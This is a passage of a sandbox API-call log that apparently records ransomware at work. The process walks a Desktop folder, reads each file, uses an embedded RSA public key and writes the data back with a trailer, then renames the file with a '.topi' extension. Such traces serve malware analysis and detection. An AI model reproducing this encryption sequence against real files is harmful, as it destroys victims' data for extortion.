HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9060 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9048 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9018 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9000 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3730 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.463] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.463] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x168b6, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x168b6, lpOverlapped=0x0) returned 1 [0094.464] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0094.464] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x168bb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.464] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.464] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.464] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.464] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.464] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.464] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.465] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.465] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.465] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.465] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.465] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.465] CloseHandle (hObject=0x6a8) returned 1 [0094.466] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.466] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.466] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.467] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G1XIoiutIi.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g1xioiutii.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\G1XIoiutIi.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\g1xioiutii.mp3.topi")) returned 1 [0094.467] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.467] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.467] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.468] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.469] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc277f0e0, ftCreationTime.dwHighDateTime=0x1d5b945, ftLastAccessTime.dwLowDateTime=0x480dc750, ftLastAccessTime.dwHighDateTime=0x1d5c591, ftLastWriteTime.dwLowDateTime=0x480dc750, ftLastWriteTime.dwHighDateTime=0x1d5c591, nFileSizeHigh=0x0, nFileSizeLow=0xee02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hq9LaKRv4rTXnAj.mp4", cAlternateFileName="HQ9LAK~1.MP4")) returned 1 [0094.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.469] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.469] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hq9LaKRv4rTXnAj.mp4") returned=".mp4" [0094.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hq9LaKRv4rTXnAj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hq9lakrv4rtxnaj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.469] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=60930) returned 1 [0094.469] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.472] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xeddc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.472] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.473] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.473] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xee02, lpOverlapped=0x0) returned 1 [0094.473] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.473] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.473] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.473] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0094.474] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.474] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.474] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.474] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.474] GetLastError () returned 0x0 [0094.474] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.475] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0094.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.475] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.475] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.475] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee00) returned 0x99f52d8 [0094.475] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3730 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9000 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3778 [0094.475] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9018 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9048 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9060 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.476] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9048 | out: hHeap=0x680000) returned 1 [0094.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9060 | out: hHeap=0x680000) returned 1 [0094.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9060 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9048 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9060 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9048 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.477] GetCurrentThreadId () returned 0x8c4 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e18b0 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.477] GetCurrentThreadId () returned 0x8c4 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.478] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9048 [0094.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0094.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9060 [0094.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9030 [0094.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.479] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.480] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hq9LaKRv4rTXnAj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hq9lakrv4rtxnaj.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hq9LaKRv4rTXnAj.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hq9lakrv4rtxnaj.mp4.topi")) returned 1 [0094.481] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.481] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.481] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.482] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.482] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19859800, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0x538d6d50, ftLastAccessTime.dwHighDateTime=0x1d5be7b, ftLastWriteTime.dwLowDateTime=0x538d6d50, ftLastWriteTime.dwHighDateTime=0x1d5be7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HuRLDatxCVujdx", cAlternateFileName="HURLDA~1")) returned 1 [0094.482] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iKQxeuzCSevEnfmn0gcx.mkv") returned=".mkv" [0094.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iKQxeuzCSevEnfmn0gcx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ikqxeuzcsevenfmn0gcx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.482] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=32933) returned 1 [0094.482] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.485] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x807f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 